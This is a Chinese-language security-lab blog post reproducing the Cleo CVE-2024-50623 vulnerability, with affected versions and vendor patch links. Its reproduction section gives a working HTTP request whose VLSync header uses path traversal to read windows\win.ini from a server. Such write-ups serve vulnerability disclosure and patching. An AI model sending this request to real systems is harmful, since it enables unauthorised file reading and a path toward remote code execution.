【成功复现】Cleo产品远程命令执行漏洞(CVE-2024-50623)
【成功复现】Cleo产品远程命令执行漏洞(CVE-2024-50623)
弥天安全实验室 弥天安全实验室 2025-01-07 04:27
网安引领时代,弥天点亮未来
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍Cleo LexiCom等都是Cleo公司的产品。Cleo LexiCom是一个集成平台。Cleo Harmony是一个文件集成解决方案。Cleo VLTrader是一个安全托管文件传输软件。Cleo多款产品存在安全漏洞,该漏洞源于包含一个JavaScript注入问题。以下产品及版本受到影响:Cleo Harmony 5.8.0.20版本之前,VLTrader 5.8.0.20版本之前和LexiCom 5.8.0.20版本。攻击者可以通过该漏洞进行读写操作,从而进行RCE。0x02影响版本
Cleo Harmony < 5.8.0.24
Cleo VLTrader < 5.8.0.24
Cleo LexiCom < 5.8.0.24
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现 POC 漏洞复现GET /Synchronization HTTP/1.1Host: {{Host}}VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=192.168.1.100;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=……\windows\win.iniContent-Type: multipart/form-data; boundary=—————————12345678901234567890123456Content-Length: 0 测试进行文件读取,通过响应判断漏洞存在。0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisoryhttps://labs.watchtowr.com/cleo-cve-2024-50623/弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润! 弥 天安全实验室